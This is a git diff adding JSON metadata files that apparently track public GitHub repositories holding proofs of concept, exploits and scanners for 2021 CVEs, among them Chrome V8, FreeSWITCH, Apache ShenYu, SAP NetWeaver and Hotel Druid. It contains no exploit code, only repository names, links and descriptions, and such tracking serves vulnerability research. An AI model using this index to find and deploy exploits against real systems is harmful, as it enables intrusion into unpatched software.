+++ b/2021/CVE-2021-37152.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 408041781,
+ "name": "CVE-2021-37152",
+ "full_name": "SecurityAnalysts\/CVE-2021-37152",
+ "owner": {
+ "login": "SecurityAnalysts",
+ "id": 26019141,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26019141?v=4",
+ "html_url": "https:\/\/github.com\/SecurityAnalysts"
+ },
+ "html_url": "https:\/\/github.com\/SecurityAnalysts\/CVE-2021-37152",
+ "description": "Exploit Accsess network clients by sending packets in wirless TP-LINK and preparing for a mitm attack",
+ "fork": false,
+ "created_at": "2021-09-19T05:37:37Z",
+ "updated_at": "2021-10-27T16:54:04Z",
+ "pushed_at": "2021-07-26T08:37:36Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3749.json b/2021/CVE-2021-3749.json
new file mode 100644
index 0000000000..19a2d19b7d
--- /dev/null
+++ b/2021/CVE-2021-3749.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 502506261,
+ "name": "axios-redos",
+ "full_name": "T-Guerrero\/axios-redos",
+ "owner": {
+ "login": "T-Guerrero",
+ "id": 54722457,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54722457?v=4",
+ "html_url": "https:\/\/github.com\/T-Guerrero"
+ },
+ "html_url": "https:\/\/github.com\/T-Guerrero\/axios-redos",
+ "description": "Axios Redos (CVE-2021-3749) proof of concept",
+ "fork": false,
+ "created_at": "2022-06-12T03:06:45Z",
+ "updated_at": "2022-06-12T03:39:48Z",
+ "pushed_at": "2022-07-07T02:49:38Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-3754.json b/2021/CVE-2021-3754.json
new file mode 100644
index 0000000000..d954f79790
--- /dev/null
+++ b/2021/CVE-2021-3754.json
@@ -0,0 +1,52 @@
+[
+ {
+ "id": 688367174,
+ "name": "CVE-2021-3754",
+ "full_name": "7Ragnarok7\/CVE-2021-3754",
+ "owner": {
+ "login": "7Ragnarok7",
+ "id": 35977703,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35977703?v=4",
+ "html_url": "https:\/\/github.com\/7Ragnarok7"
+ },
+ "html_url": "https:\/\/github.com\/7Ragnarok7\/CVE-2021-3754",
+ "description": "Vulnerability details and exploit for CVE-2021-3754",
+ "fork": false,
+ "created_at": "2023-09-07T07:49:21Z",
+ "updated_at": "2024-06-22T04:47:02Z",
+ "pushed_at": "2024-06-22T04:46:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "7ragnarok7",
+ "apache",
+ "cve",
+ "cve-2021-3754",
+ "cvss",
+ "cybersecurity",
+ "exploit",
+ "exploitation",
+ "hack",
+ "hacking",
+ "keycloak",
+ "nist",
+ "nsd",
+ "nvd",
+ "redhat",
+ "security",
+ "sso",
+ "sso-authentication",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37580.json b/2021/CVE-2021-37580.json
new file mode 100644
index 0000000000..fbaa5a9455
--- /dev/null
+++ b/2021/CVE-2021-37580.json
@@ -0,0 +1,212 @@
+[
+ {
+ "id": 428966283,
+ "name": "CVE-2021-37580",
+ "full_name": "rabbitsafe\/CVE-2021-37580",
+ "owner": {
+ "login": "rabbitsafe",
+ "id": 33046073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046073?v=4",
+ "html_url": "https:\/\/github.com\/rabbitsafe"
+ },
+ "html_url": "https:\/\/github.com\/rabbitsafe\/CVE-2021-37580",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-17T08:33:25Z",
+ "updated_at": "2024-05-20T09:43:59Z",
+ "pushed_at": "2021-11-18T04:41:44Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 429055913,
+ "name": "CVE-2021-37580",
+ "full_name": "fengwenhua\/CVE-2021-37580",
+ "owner": {
+ "login": "fengwenhua",
+ "id": 26518808,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26518808?v=4",
+ "html_url": "https:\/\/github.com\/fengwenhua"
+ },
+ "html_url": "https:\/\/github.com\/fengwenhua\/CVE-2021-37580",
+ "description": "CVE-2021-37580的poc",
+ "fork": false,
+ "created_at": "2021-11-17T13:26:46Z",
+ "updated_at": "2024-02-25T20:55:37Z",
+ "pushed_at": "2023-06-18T01:19:09Z",
+ "stargazers_count": 38,
+ "watchers_count": 38,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 38,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 429697308,
+ "name": "westone-CVE-2021-37580-scanner",
+ "full_name": "Osyanina\/westone-CVE-2021-37580-scanner",
+ "owner": {
+ "login": "Osyanina",
+ "id": 78467376,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78467376?v=4",
+ "html_url": "https:\/\/github.com\/Osyanina"
+ },
+ "html_url": "https:\/\/github.com\/Osyanina\/westone-CVE-2021-37580-scanner",
+ "description": "A vulnerability scanner that detects CVE-2021-37580 vulnerabilities.",
+ "fork": false,
+ "created_at": "2021-11-19T06:49:35Z",
+ "updated_at": "2021-11-19T06:54:08Z",
+ "pushed_at": "2021-11-19T06:54:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 429720874,
+ "name": "CVE-2021-37580",
+ "full_name": "ZororoZ\/CVE-2021-37580",
+ "owner": {
+ "login": "ZororoZ",
+ "id": 46238787,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46238787?v=4",
+ "html_url": "https:\/\/github.com\/ZororoZ"
+ },
+ "html_url": "https:\/\/github.com\/ZororoZ\/CVE-2021-37580",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-19T08:21:44Z",
+ "updated_at": "2023-09-28T11:33:22Z",
+ "pushed_at": "2021-11-19T08:44:37Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 429731870,
+ "name": "CVE-2021-37580",
+ "full_name": "Liang2580\/CVE-2021-37580",
+ "owner": {
+ "login": "Liang2580",
+ "id": 27684409,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27684409?v=4",
+ "html_url": "https:\/\/github.com\/Liang2580"
+ },
+ "html_url": "https:\/\/github.com\/Liang2580\/CVE-2021-37580",
+ "description": "CVE-2021-37580",
+ "fork": false,
+ "created_at": "2021-11-19T09:00:37Z",
+ "updated_at": "2023-09-28T11:33:22Z",
+ "pushed_at": "2021-11-19T09:03:13Z",
+ "stargazers_count": 8,
+ "watchers_count": 8,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 8,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 429816997,
+ "name": "CVE-2021-37580",
+ "full_name": "Wing-song\/CVE-2021-37580",
+ "owner": {
+ "login": "Wing-song",
+ "id": 40231286,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40231286?v=4",
+ "html_url": "https:\/\/github.com\/Wing-song"
+ },
+ "html_url": "https:\/\/github.com\/Wing-song\/CVE-2021-37580",
+ "description": " Apache ShenYu 管理员认证绕过 ",
+ "fork": false,
+ "created_at": "2021-11-19T13:59:26Z",
+ "updated_at": "2021-11-19T15:23:18Z",
+ "pushed_at": "2021-11-19T15:23:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 702911359,
+ "name": "Apache-ShenYu-Admin-JWT-CVE-2021-37580-",
+ "full_name": "CN016\/Apache-ShenYu-Admin-JWT-CVE-2021-37580-",
+ "owner": {
+ "login": "CN016",
+ "id": 108575004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4",
+ "html_url": "https:\/\/github.com\/CN016"
+ },
+ "html_url": "https:\/\/github.com\/CN016\/Apache-ShenYu-Admin-JWT-CVE-2021-37580-",
+ "description": "Apache ShenYu Admin JWT认证绕过漏洞(CVE-2021-37580)",
+ "fork": false,
+ "created_at": "2023-10-10T08:41:54Z",
+ "updated_at": "2024-04-22T11:29:18Z",
+ "pushed_at": "2023-10-10T08:43:17Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37624.json b/2021/CVE-2021-37624.json
new file mode 100644
index 0000000000..fe0dd0ee4f
--- /dev/null
+++ b/2021/CVE-2021-37624.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 432716321,
+ "name": "PewSWITCH",
+ "full_name": "0xInfection\/PewSWITCH",
+ "owner": {
+ "login": "0xInfection",
+ "id": 39941993,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39941993?v=4",
+ "html_url": "https:\/\/github.com\/0xInfection"
+ },
+ "html_url": "https:\/\/github.com\/0xInfection\/PewSWITCH",
+ "description": "A FreeSWITCH specific scanning and exploitation toolkit for CVE-2021-37624 and CVE-2021-41157.",
+ "fork": false,
+ "created_at": "2021-11-28T13:12:38Z",
+ "updated_at": "2024-05-18T09:20:29Z",
+ "pushed_at": "2021-12-05T16:54:16Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "exploitation-framework",
+ "freeswitch",
+ "security",
+ "sip-security",
+ "unauthenticated-requests",
+ "voip-telephony-providers"
+ ],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37678.json b/2021/CVE-2021-37678.json
new file mode 100644
index 0000000000..2805f4fceb
--- /dev/null
+++ b/2021/CVE-2021-37678.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 404721741,
+ "name": "ExploitTensorflowCVE-2021-37678",
+ "full_name": "fran-CICS\/ExploitTensorflowCVE-2021-37678",
+ "owner": {
+ "login": "fran-CICS",
+ "id": 11778309,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11778309?v=4",
+ "html_url": "https:\/\/github.com\/fran-CICS"
+ },
+ "html_url": "https:\/\/github.com\/fran-CICS\/ExploitTensorflowCVE-2021-37678",
+ "description": "TP Seguridad Informática UTN FRBA 2021",
+ "fork": false,
+ "created_at": "2021-09-09T12:55:55Z",
+ "updated_at": "2021-11-06T02:59:16Z",
+ "pushed_at": "2021-11-06T02:59:14Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37740.json b/2021/CVE-2021-37740.json
new file mode 100644
index 0000000000..2ffc1b4eb3
--- /dev/null
+++ b/2021/CVE-2021-37740.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 476823243,
+ "name": "CVE-2021-37740",
+ "full_name": "robertguetzkow\/CVE-2021-37740",
+ "owner": {
+ "login": "robertguetzkow",
+ "id": 25986807,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25986807?v=4",
+ "html_url": "https:\/\/github.com\/robertguetzkow"
+ },
+ "html_url": "https:\/\/github.com\/robertguetzkow\/CVE-2021-37740",
+ "description": "PoC for DoS vulnerability CVE-2021-37740 in firmware v3.0.3 of SCN-IP100.03 and SCN-IP000.03 by MDT. The bug has been fixed in firmware v3.0.4.",
+ "fork": false,
+ "created_at": "2022-04-01T18:07:42Z",
+ "updated_at": "2024-04-15T17:16:55Z",
+ "pushed_at": "2022-07-22T17:16:14Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "denial-of-service",
+ "poc",
+ "security"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37748.json b/2021/CVE-2021-37748.json
new file mode 100644
index 0000000000..50befac9fa
--- /dev/null
+++ b/2021/CVE-2021-37748.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 421010663,
+ "name": "CVE-2021-37748",
+ "full_name": "SECFORCE\/CVE-2021-37748",
+ "owner": {
+ "login": "SECFORCE",
+ "id": 8157384,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8157384?v=4",
+ "html_url": "https:\/\/github.com\/SECFORCE"
+ },
+ "html_url": "https:\/\/github.com\/SECFORCE\/CVE-2021-37748",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-25T12:16:41Z",
+ "updated_at": "2023-11-16T14:11:43Z",
+ "pushed_at": "2021-10-25T12:57:55Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37832.json b/2021/CVE-2021-37832.json
new file mode 100644
index 0000000000..1ad8135ab4
--- /dev/null
+++ b/2021/CVE-2021-37832.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 391489574,
+ "name": "CVE-2021-37832",
+ "full_name": "dievus\/CVE-2021-37832",
+ "owner": {
+ "login": "dievus",
+ "id": 25853389,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25853389?v=4",
+ "html_url": "https:\/\/github.com\/dievus"
+ },
+ "html_url": "https:\/\/github.com\/dievus\/CVE-2021-37832",
+ "description": "CVE-2021-37832 - Hotel Druid 3.0.2 SQL Injection Vulnerability - 9.8 CVSS 3.1",
+ "fork": false,
+ "created_at": "2021-08-01T00:38:56Z",
+ "updated_at": "2023-09-28T11:30:02Z",
+ "pushed_at": "2021-08-12T00:09:39Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 434506274,
+ "name": "CVE-2021-37832",
+ "full_name": "AK-blank\/CVE-2021-37832",
+ "owner": {
+ "login": "AK-blank",
+ "id": 56591429,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56591429?v=4",
+ "html_url": "https:\/\/github.com\/AK-blank"
+ },
+ "html_url": "https:\/\/github.com\/AK-blank\/CVE-2021-37832",
+ "description": "CVE 2021-37832 poc",
+ "fork": false,
+ "created_at": "2021-12-03T07:35:02Z",
+ "updated_at": "2021-12-05T06:19:08Z",
+ "pushed_at": "2021-12-03T07:54:30Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37833.json b/2021/CVE-2021-37833.json
new file mode 100644
index 0000000000..1ef85301cb
--- /dev/null
+++ b/2021/CVE-2021-37833.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 391489074,
+ "name": "CVE-2021-37833",
+ "full_name": "dievus\/CVE-2021-37833",
+ "owner": {
+ "login": "dievus",
+ "id": 25853389,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25853389?v=4",
+ "html_url": "https:\/\/github.com\/dievus"
+ },
+ "html_url": "https:\/\/github.com\/dievus\/CVE-2021-37833",
+ "description": "CVE 2021-37833 Hotel Druid 3.0.2 Reflected Cross Site Scripting",
+ "fork": false,
+ "created_at": "2021-08-01T00:34:27Z",
+ "updated_at": "2023-09-28T11:30:02Z",
+ "pushed_at": "2021-08-03T13:44:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37910.json b/2021/CVE-2021-37910.json
new file mode 100644
index 0000000000..ba908a8300
--- /dev/null
+++ b/2021/CVE-2021-37910.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 497138927,
+ "name": "easy-exploits",
+ "full_name": "efchatz\/easy-exploits",
+ "owner": {
+ "login": "efchatz",
+ "id": 43434138,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43434138?v=4",
+ "html_url": "https:\/\/github.com\/efchatz"
+ },
+ "html_url": "https:\/\/github.com\/efchatz\/easy-exploits",
+ "description": "Exploits of different CVE IDs (CVE-2021-37910, CVE-2021-40288, CVE-2021-41435, CVE-2021-41436, CVE-2021-41437, CVE-2021-41441, CVE-2021-41442, CVE-2021-41445, CVE-2021-41449, CVE-2021-41450, CVE-2021-41451, CVE-2021-41753, CVE-2021-41788, CVE-2021-46353, CVE-2022-41540, CVE-2022-41541)",
+ "fork": false,
+ "created_at": "2022-05-27T21:09:03Z",
+ "updated_at": "2024-06-17T05:33:55Z",
+ "pushed_at": "2022-10-19T21:24:35Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37975.json b/2021/CVE-2021-37975.json
new file mode 100644
index 0000000000..1f483a5e60
--- /dev/null
+++ b/2021/CVE-2021-37975.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 446380998,
+ "name": "CVE-2021-37975",
+ "full_name": "ssaroussi\/CVE-2021-37975",
+ "owner": {
+ "login": "ssaroussi",
+ "id": 19860280,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19860280?v=4",
+ "html_url": "https:\/\/github.com\/ssaroussi"
+ },
+ "html_url": "https:\/\/github.com\/ssaroussi\/CVE-2021-37975",
+ "description": "Playground for the exploitation process",
+ "fork": false,
+ "created_at": "2022-01-10T10:41:00Z",
+ "updated_at": "2024-06-19T23:58:57Z",
+ "pushed_at": "2022-02-06T20:02:34Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-37980.json b/2021/CVE-2021-37980.json
new file mode 100644
index 0000000000..424679bdeb
--- /dev/null
+++ b/2021/CVE-2021-37980.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 416466988,
+ "name": "CVE-2021-37980",
+ "full_name": "ZeusBox\/CVE-2021-37980",
+ "owner": {
+ "login": "ZeusBox",
+ "id": 78951067,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78951067?v=4",
+ "html_url": "https:\/\/github.com\/ZeusBox"
+ },
+ "html_url": "https:\/\/github.com\/ZeusBox\/CVE-2021-37980",
+ "description": "PoC CVE-2021-37980 : Inappropriate implementation in Sandbox (windows only)",
+ "fork": false,
+ "created_at": "2021-10-12T19:14:29Z",
+ "updated_at": "2024-01-17T16:03:38Z",
+ "pushed_at": "2021-10-14T19:54:12Z",
+ "stargazers_count": 71,
+ "watchers_count": 71,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 71,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38001.json b/2021/CVE-2021-38001.json
new file mode 100644
index 0000000000..ec78a10e6f
--- /dev/null
+++ b/2021/CVE-2021-38001.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 424810404,
+ "name": "TFC-Chrome-v8-bug-CVE-2021-38001-poc",
+ "full_name": "maldiohead\/TFC-Chrome-v8-bug-CVE-2021-38001-poc",
+ "owner": {
+ "login": "maldiohead",
+ "id": 23315692,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23315692?v=4",
+ "html_url": "https:\/\/github.com\/maldiohead"
+ },
+ "html_url": "https:\/\/github.com\/maldiohead\/TFC-Chrome-v8-bug-CVE-2021-38001-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-05T02:58:15Z",
+ "updated_at": "2023-04-19T12:03:28Z",
+ "pushed_at": "2021-11-05T03:18:48Z",
+ "stargazers_count": 6,
+ "watchers_count": 6,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 6,
+ "score": 0,
+ "subscribers_count": 3
+ },
+ {
+ "id": 424814670,
+ "name": "TFC-Chrome-v8-bug-CVE-2021-38001-poc",
+ "full_name": "Peterpan0927\/TFC-Chrome-v8-bug-CVE-2021-38001-poc",
+ "owner": {
+ "login": "Peterpan0927",
+ "id": 26504662,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26504662?v=4",
+ "html_url": "https:\/\/github.com\/Peterpan0927"
+ },
+ "html_url": "https:\/\/github.com\/Peterpan0927\/TFC-Chrome-v8-bug-CVE-2021-38001-poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-05T03:18:46Z",
+ "updated_at": "2023-09-28T11:32:59Z",
+ "pushed_at": "2021-11-05T03:17:58Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 637851425,
+ "name": "CVE-2021-38001",
+ "full_name": "TheHermione\/CVE-2021-38001",
+ "owner": {
+ "login": "TheHermione",
+ "id": 73027590,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/73027590?v=4",
+ "html_url": "https:\/\/github.com\/TheHermione"
+ },
+ "html_url": "https:\/\/github.com\/TheHermione\/CVE-2021-38001",
+ "description": "A Brief Introduction to V8 Inline Cache and Exploitating Type Confusion",
+ "fork": false,
+ "created_at": "2023-05-08T14:43:03Z",
+ "updated_at": "2023-05-08T14:49:31Z",
+ "pushed_at": "2023-05-08T14:49:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38003.json b/2021/CVE-2021-38003.json
new file mode 100644
index 0000000000..c8798a0939
--- /dev/null
+++ b/2021/CVE-2021-38003.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 586157765,
+ "name": "Chrome-V8-RCE-CVE-2021-38003",
+ "full_name": "SpiralBL0CK\/Chrome-V8-RCE-CVE-2021-38003",
+ "owner": {
+ "login": "SpiralBL0CK",
+ "id": 25670930,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4",
+ "html_url": "https:\/\/github.com\/SpiralBL0CK"
+ },
+ "html_url": "https:\/\/github.com\/SpiralBL0CK\/Chrome-V8-RCE-CVE-2021-38003",
+ "description": "CVE-2021-38003 exploits extracted from https:\/\/twitter.com\/WhichbufferArda\/status\/1609604183535284224",
+ "fork": false,
+ "created_at": "2023-01-07T06:09:14Z",
+ "updated_at": "2024-04-11T06:20:57Z",
+ "pushed_at": "2023-01-07T19:41:36Z",
+ "stargazers_count": 32,
+ "watchers_count": 32,
+ "has_discussions": false,
+ "forks_count": 13,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 13,
+ "watchers": 32,
+ "score": 0,
+ "subscribers_count": 4
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38149.json b/2021/CVE-2021-38149.json
new file mode 100644
index 0000000000..c318f67a62
--- /dev/null
+++ b/2021/CVE-2021-38149.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 393319863,
+ "name": "CVE-2021-38149",
+ "full_name": "jboogie15\/CVE-2021-38149",
+ "owner": {
+ "login": "jboogie15",
+ "id": 67240643,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67240643?v=4",
+ "html_url": "https:\/\/github.com\/jboogie15"
+ },
+ "html_url": "https:\/\/github.com\/jboogie15\/CVE-2021-38149",
+ "description": "Chikitsa Patient Management System Stored Cross-Site Scripting (XSS)",
+ "fork": false,
+ "created_at": "2021-08-06T09:01:40Z",
+ "updated_at": "2021-08-10T19:54:20Z",
+ "pushed_at": "2021-08-06T09:39:58Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-38163.json b/2021/CVE-2021-38163.json
new file mode 100644
index 0000000000..f935c5e5e2
--- /dev/null
+++ b/2021/CVE-2021-38163.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 534881743,
+ "name": "CVE-2021-38163",
+ "full_name": "core1impact\/CVE-2021-38163",
+ "owner": {
+ "login": "core1impact",
+ "id": 80303847,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80303847?v=4",
+ "html_url": "https:\/\/github.com\/core1impact"
+ },
+ "html_url": "https:\/\/github.com\/core1impact\/CVE-2021-38163",
+ "description": "CVE-2021-38163 - exploit for SAP Netveawer",
+ "fork": false,
+ "created_at": "2022-09-10T03:41:52Z",
+ "updated_at": "2023-05-22T10:56:10Z",
+ "pushed_at": "2022-09-10T04:42:38Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
